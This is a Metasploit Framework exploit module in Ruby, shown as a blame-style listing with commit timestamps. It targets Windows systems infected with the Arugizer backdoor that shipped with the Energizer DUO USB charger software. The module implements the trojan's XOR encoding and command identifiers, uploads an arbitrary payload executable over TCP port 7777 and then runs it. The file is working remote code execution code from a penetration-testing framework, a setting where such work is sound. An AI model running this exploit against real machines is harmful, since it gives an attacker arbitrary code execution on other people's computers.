2010-05-03 17:13:09 +00:00
|
|
|
##
|
|
|
|
# $Id$
|
|
|
|
##
|
|
|
|
|
2010-03-08 19:06:50 +00:00
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# Framework web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/framework/
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
|
|
Rank = ExcellentRanking
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::Tcp
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Energizer DUO Trojan Code Execution',
|
|
|
|
'Description' => %q{
|
2010-05-03 17:13:09 +00:00
|
|
|
This module will execute an arbitrary payload against
|
|
|
|
any system infected with the Arugizer trojan horse. This
|
|
|
|
backdoor was shipped with the software package accompanying
|
|
|
|
the Energizer Duo USB battery charger.
|
2010-03-08 19:06:50 +00:00
|
|
|
},
|
|
|
|
'Author' => [ 'hdm' ],
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Version' => '$Revision$',
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
['CVE', '2010-0103'],
|
|
|
|
['URL', 'http://www.kb.cert.org/vuls/id/154421']
|
|
|
|
],
|
|
|
|
'Platform' => 'win',
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
[ 'Automatic', { } ],
|
|
|
|
],
|
|
|
|
'DefaultTarget' => 0
|
|
|
|
))
|
|
|
|
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
Opt::RPORT(7777),
|
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
def trojan_encode(str)
|
|
|
|
str.unpack("C*").map{|c| c ^ 0xE5}.pack("C*")
|
|
|
|
end
|
|
|
|
|
|
|
|
def trojan_command(cmd)
|
|
|
|
cid = ""
|
|
|
|
|
|
|
|
case cmd
|
|
|
|
when :exec
|
|
|
|
cid = "{8AF1C164-EBD6-4b2b-BC1F-64674E98A710}"
|
|
|
|
when :dir
|
|
|
|
cid = "{0174D2FC-7CB6-4a22-87C7-7BB72A32F19F}"
|
|
|
|
when :write
|
|
|
|
cid = "{98D958FC-D0A2-4f1c-B841-232AB357E7C8}"
|
|
|
|
when :read
|
|
|
|
cid = "{F6C43E1A-1551-4000-A483-C361969AEC41}"
|
|
|
|
when :nop
|
|
|
|
cid = "{783EACBF-EF8B-498e-A059-F0B5BD12641E}"
|
|
|
|
when :find
|
|
|
|
cid = "{EA7A2EB7-1E49-4d5f-B4D8-D6645B7440E3}"
|
|
|
|
when :yes
|
|
|
|
cid = "{E2AC5089-3820-43fe-8A4D-A7028FAD8C28}"
|
|
|
|
when :runonce
|
|
|
|
cid = "{384EBE2C-F9EA-4f6b-94EF-C9D2DA58FD13}"
|
|
|
|
when :delete
|
|
|
|
cid = "{4F4F0D88-E715-4b1f-B311-61E530C2C8FC}"
|
|
|
|
end
|
|
|
|
|
|
|
|
trojan_encode(
|
|
|
|
[cid.length + 1].pack("V") + cid + "\x00"
|
|
|
|
)
|
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
|
|
|
|
nam = "C:\\" + Rex::Text.rand_text_alphanumeric(12) + ".exe" + "\x00"
|
|
|
|
exe = Msf::Util::EXE.to_win32pe(framework,payload.encoded) + "\x00"
|
|
|
|
|
|
|
|
|
|
|
|
print_status("Trying to upload #{nam}...")
|
|
|
|
connect
|
|
|
|
|
|
|
|
# Write file request
|
|
|
|
sock.put(trojan_command(:write))
|
|
|
|
sock.put(trojan_encode([nam.length].pack("V")))
|
|
|
|
sock.put(trojan_encode(nam))
|
|
|
|
sock.put(trojan_encode([exe.length].pack("V")))
|
|
|
|
sock.put(trojan_encode(exe))
|
|
|
|
|
|
|
|
# Required to prevent the server from spinning a loop
|
|
|
|
sock.put(trojan_command(:nop))
|
|
|
|
|
|
|
|
disconnect
|
|
|
|
|
|
|
|
#
|
|
|
|
# Execute the payload
|
|
|
|
#
|
|
|
|
|
|
|
|
print_status("Trying to execute #{nam}...")
|
|
|
|
|
|
|
|
connect
|
|
|
|
|
|
|
|
# Execute file request
|
|
|
|
sock.put(trojan_command(:exec))
|
|
|
|
sock.put(trojan_encode([nam.length].pack("V")))
|
|
|
|
sock.put(trojan_encode(nam))
|
|
|
|
|
|
|
|
# Required to prevent the server from spinning a loop
|
|
|
|
sock.put(trojan_command(:nop))
|
|
|
|
|
|
|
|
disconnect
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|